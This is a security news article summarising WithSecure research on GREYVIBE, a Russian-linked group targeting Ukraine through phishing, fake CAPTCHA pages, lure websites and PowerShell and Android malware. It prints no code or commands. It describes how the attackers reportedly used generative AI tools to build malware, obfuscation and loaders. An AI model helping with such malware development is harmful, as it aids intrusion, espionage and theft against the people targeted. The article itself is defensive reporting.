New Russian-Linked GREYVIBE Targets Ukraine with AI-Powered Cyberattacks

A previously undocumented threat actor known as GREYVIBE has been linked to a series of ongoing cyberattacks targeting Ukraine and associated entities, commencing in August 2025.

According to research by WithSecure, GREYVIBE is identified as a Russian-speaking group operating primarily within the Russian time zone. Their activities align closely with state interests of the Kremlin, particularly concerning intelligence gathering related to the ongoing Russo-Ukrainian conflict.

"The group has utilized various attack vectors, such as spear-phishing emails, fake captcha pages, and fraudulent adult entertainment websites attributed to Ukraine, to deploy malware across a diverse range of victims," stated WithSecure researcher Mohammad Kazem Hassan Nejad in an analysis. "Throughout these operations, the group has employed custom-obfuscated code, loaders, and various malware programs."

The range of victims encompasses military, government, civilian, and commercial organizations. Despite their connection to nation-state activities, GREYVIBE also appears to integrate with the broader Russian cybercrime community, as several of its members are suspected of being current or former cybercriminals.

Furthermore, evidence suggests that the adversary is harnessing generative artificial intelligence (GenAI) and large language models (LLMs) to enhance their operations. Collectively, WithSecure characterizes GREYVIBE as a "low-to-moderately sophisticated group," which exhibits operational security shortcomings while utilizing AI-assisted tools to improve their malware development processes.

Attack Chains

GREYVIBE has been documented executing a series of attack chains against its targets:

PhantomMail involves spear-phishing emails that distribute links to malicious ZIP or RAR archives hosted on Google Drive and 4sync. These archives contain JavaScript-based loaders that launch a decoy document and activate PhantomRelay, a PowerShell-based remote access trojan (RAT) designed to profile the host and execute PowerShell scripts and Windows commands.

PhantomClick employs ClickFix-style fake CAPTCHA pages on fraudulent domains disguised as Zoom and LAPAS, tricking users into executing commands that initiate a PhantomRelay infection chain.

PrincessClub utilizes counterfeit Ukrainian adult club websites to deliver FallSpy on Android devices and PhantomRelayV1 or LegionRelay on Windows. Subsequent iterations of these lure sites introduced a WebRTC-based live call feature to capture victim audio and video. FallSpy is an Android malware capable of extracting sensitive data, while LegionRelay functions as a lightweight PowerShell-based RAT that enables file enumeration, file exfiltration, screenshot capture, browser data theft, exfiltration of data from Telegram and WhatsApp, and configuration of RDP access. PhantomRelayV1 is a variant of PhantomRelay that incorporates a custom watchdog persistence mechanism.

DroneLink disseminates malware through websites that impersonate charitable organizations supporting the Armed Forces of Ukraine, delivering WireGuard and LegionRelay.

Nebo utilizes a FallSpy variant that mimics a Russian-language login interface, likely intending to deceive Ukrainian military personnel into believing they are accessing a legitimate Russian military portal.

AI-Assisted Operations

The diverse array of delivery methods and tools observed in these attacks likely results from the utilization of AI platforms, such as Ideogram AI, OpenAI ChatGPT, and Google Gemini. These platforms assist in generating images, developing LegionRelay, creating obfuscation and loader scripts, managing backend infrastructure, and executing post-compromise commands.

WithSecure indicates that GREYVIBE's engagement with AI presents several advantages, such as compensating for gaps in technical proficiency, accelerating the development process, and minimizing dependency on already known malware or tools that may reveal their identity.

"If an actor can consistently generate, modify, or substitute elements of its operational footprint with AI assistance, traditional clustering techniques based on stable technical artifacts may prove less reliable over time," Nejad noted.

However, the employment of AI has also inadvertently introduced design errors within LegionRelay, exposing the inner workings of the malware. This development suggests that GREYVIBE may not represent a fully polished nation-state actor, as more sophisticated adversaries generally avoid such missteps.

Links to Cybercrime Ecosystem

The group's connections to the cybercriminal ecosystem can be attributed to several key aspects:

• Potential access to an ISO builder associated with the TrickBot gang and UAC-0098
• Instances of PhantomRelay variants appearing across diverse cybercrime activity clusters, notably a Microsoft Teams voice phishing campaign between July 2025 and February 2026, and a KongTuke delivery chain from late February to late March 2026, which leveraged ClickFix for malware distribution
• The upload of preliminary development and testing samples to VirusTotal
• The adoption of informal internet slang terms such as "letsrollboyos," "totallyunsus," and "cuteuwu" as naming conventions for developmental artifacts
• The deployment of XMRig miners on a limited number of LegionRelay-infected machines

"Considering these factors, we assess with moderate confidence that the group has affiliations with the broader cybercrime ecosystem, and with low-to-moderate confidence that it includes current or former cybercriminal members," WithSecure asserted. "The precise nature of their relationship to the Russian state remains ambiguous; it is unclear whether such members have been integrated into a state-backed collective, operate independently under state-directed objectives, or have formed a hybrid entity."

"The group finds itself in a grey area between cybercrime and state-affiliated operations, complicating attribution efforts and blurring conventional distinctions between these domains."